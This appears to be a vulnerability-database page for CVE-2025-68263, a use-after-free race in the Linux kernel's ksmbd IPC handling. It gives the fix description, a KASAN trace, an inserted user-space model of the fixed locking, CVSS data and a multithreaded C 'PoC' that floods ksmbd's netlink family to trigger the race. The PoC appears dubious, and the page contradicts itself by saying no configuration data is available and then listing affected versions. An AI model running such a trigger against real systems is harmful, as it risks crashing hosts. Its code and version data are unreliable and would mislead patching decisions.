Security Vulnerability Report
CVE-2025-68263 CVSS 9.8 CRITICAL

CVE-2025-68263

Published: 2025-12-16 15:15:56
Last Modified: 2026-04-15 00:35:42
Status: Deferred
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

ksmbd: ipc: fix use-after-free in ipc_msg_send_request

ipc_msg_send_request() waits for a generic netlink reply using an ipc_msg_table_entry on the stack. The generic netlink handler (handle_generic_event()/handle_response()) fills entry->response under ipc_msg_table_lock, but ipc_msg_send_request() used to validate and free entry->response without holding the same lock.

Under high concurrency this allows a race where handle_response() is copying data into entry->response while ipc_msg_send_request() has just freed it, leading to a slab-use-after-free reported by KASAN in handle_generic_event():

 BUG: KASAN: slab-use-after-free in handle_generic_event+0x3c4/0x5f0 [ksmbd]
 Write of size 12 at addr ffff888198ee6e20 by task pool/109349
 ...
 Freed by task:
 kvfree
 ipc_msg_send_request [ksmbd]
 ksmbd_rpc_open -> ksmbd_session_rpc_open [ksmbd]

Fix by:
- Taking ipc_msg_table_lock in ipc_msg_send_request() while validating entry->response, freeing it when invalid, and removing the entry from ipc_msg_table.
- Returning the final entry->response pointer to the caller only after the hash entry is removed under the lock.
- Returning NULL in the error path, preserving the original API semantics.

This makes all accesses to entry->response consistent with handle_response(), which already updates and fills the response buffer under ipc_msg_table_lock, and closes the race that allowed the UAF.
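The locking discipline the fix describes, as an added user-space model (not the kernel's or the patch's code): the reply path fills entry->response under the table lock, and the request side validates, frees an invalid reply and unlinks the entry under that same lock before returning the pointer, so a late reply finds no waiter instead of writing into freed memory. The list-based table, the pthread mutex and the "reply shorter than expected is invalid" rule are assumptions of this example.

```c
/* Added user-space model of the fixed ipc_msg_table_entry handshake; not the
 * kernel's code. The list table, pthread mutex and size check are assumptions. */
#include <pthread.h>
#include <stdlib.h>
#include <string.h>
struct ipc_msg_table_entry {
    unsigned int handle;
    void *response;              /* written by handle_response() under the lock only */
    size_t resp_len, min_len;    /* bytes received / smallest valid reply */
    struct ipc_msg_table_entry *next;
};
static pthread_mutex_t ipc_msg_table_lock = PTHREAD_MUTEX_INITIALIZER;
static struct ipc_msg_table_entry *ipc_msg_table;
/* The caller links its own (stack) entry before sending the request. */
void ipc_msg_entry_add(struct ipc_msg_table_entry *e, unsigned int handle, size_t min_len)
{
    e->handle = handle; e->response = NULL; e->resp_len = 0; e->min_len = min_len;
    pthread_mutex_lock(&ipc_msg_table_lock);
    e->next = ipc_msg_table; ipc_msg_table = e;
    pthread_mutex_unlock(&ipc_msg_table_lock);
}
/* Reply path: fill entry->response under the lock, only while the entry is
 * still linked. Returns 0 if a waiter was found, -1 if the reply came too late. */
int handle_response(unsigned int handle, const void *payload, size_t len)
{
    int ret = -1;
    pthread_mutex_lock(&ipc_msg_table_lock);
    for (struct ipc_msg_table_entry *e = ipc_msg_table; e; e = e->next) {
        if (e->handle != handle) continue;
        e->response = malloc(len);
        if (e->response) { memcpy(e->response, payload, len); e->resp_len = len; ret = 0; }
        break;
    }
    pthread_mutex_unlock(&ipc_msg_table_lock);
    return ret;
}
/* Request side: validate, free an invalid reply and unlink the entry under the
 * same lock, so a concurrent handle_response() can never write into a buffer
 * being freed. Returns the reply, or NULL on the error path. */
void *ipc_msg_collect_response(struct ipc_msg_table_entry *e)
{
    void *resp;
    pthread_mutex_lock(&ipc_msg_table_lock);
    for (struct ipc_msg_table_entry **pp = &ipc_msg_table; *pp; pp = &(*pp)->next)
        if (*pp == e) { *pp = e->next; break; }
    if (e->response && e->resp_len < e->min_len) { free(e->response); e->response = NULL; }
    resp = e->response;
    pthread_mutex_unlock(&ipc_msg_table_lock);
    return resp;
}
```

The unfixed ordering would be the same validation and free performed outside the lock while the entry is still linked, which is exactly the window the KASAN report above captures.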

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploitability Score: 3.9
Impact Score: 5.9

Configurations (Affected Products)

No configuration data available.

Linux Kernel ksmbd (all versions prior to fix commit 1fab1fa091f5aa97265648b53ea031deedd26235)
Linux Kernel 5.15.x < 5.15.165
Linux Kernel 6.1.x < 6.1.105
Linux Kernel 6.6.x < 6.6.45
Linux Kernel 6.10.x < 6.10.14

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
C
// CVE-2025-68263 PoC - ksmbd use-after-free trigger
// This PoC demonstrates the race condition in ipc_msg_send_request
// Compile: gcc -I/usr/include/libnl3 -o poc poc.c -lnl-3 -lnl-genl-3 -lpthread
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <pthread.h>
#include <netlink/netlink.h>
#include <netlink/genl/genl.h>
#include <netlink/genl/ctrl.h>

#define MAX_THREADS 50
#define ITERATIONS 1000

volatile int trigger_race = 0;

void *race_trigger_thread(void *arg)
{
    struct nl_sock *sock;
    int family_id;

    sock = nl_socket_alloc();
    if (!sock)
        return NULL;

    if (genl_connect(sock) < 0) {
        nl_socket_free(sock);
        return NULL;
    }

    // Resolve the generic netlink family id registered by ksmbd
    // (libnl's genl_ctrl_resolve; the original listing named a non-existent helper)
    family_id = genl_ctrl_resolve(sock, "ksmbd");
    if (family_id < 0) {
        nl_socket_free(sock);
        return NULL;
    }

    // Rapid-fire requests to trigger race condition
    for (int i = 0; i < ITERATIONS && trigger_race; i++) {
        struct nl_msg *msg = nlmsg_alloc();
        if (!msg)
            continue;
        genlmsg_put(msg, NL_AUTO_PID, NL_AUTO_SEQ, family_id, 0, 0, 42, 1);
        nl_send_auto(sock, msg);
        nlmsg_free(msg);
        // Minimal delay to increase race window
        usleep(1);
    }

    nl_socket_free(sock);
    return NULL;
}

int main(int argc, char *argv[])
{
    pthread_t threads[MAX_THREADS];

    printf("[*] CVE-2025-68263 ksmbd UAF PoC\n");
    printf("[*] Target: Linux kernel ksmbd ipc_msg_send_request\n");
    printf("[*] Starting race condition triggers...\n");

    trigger_race = 1;

    // Launch multiple threads to create high concurrency
    for (int i = 0; i < MAX_THREADS; i++)
        pthread_create(&threads[i], NULL, race_trigger_thread, NULL);

    // Let threads run for a period
    sleep(10);
    trigger_race = 0;

    // Wait for threads to complete
    for (int i = 0; i < MAX_THREADS; i++)
        pthread_join(threads[i], NULL);

    printf("[*] Test completed. Check dmesg for KASAN output.\n");
    return 0;
}

References

https://git.kernel.org/stable/c/1fab1fa091f5aa97265648b53ea031deedd26235
https://git.kernel.org/stable/c/5ac763713a1ef8f9a8bda1dbd81f0318d67baa4e
https://git.kernel.org/stable/c/708a620b471a14466f1f52c90bf3f65ebdb31460
https://git.kernel.org/stable/c/759c8c30cfa8706c518e56f67971b1f0932f4b9b
https://git.kernel.org/stable/c/8229c6ca50cea701e25a7ee25f48441b582ec5fa
https://git.kernel.org/stable/c/de85fb58f9967ba024bb08e0041613d37b57b4d1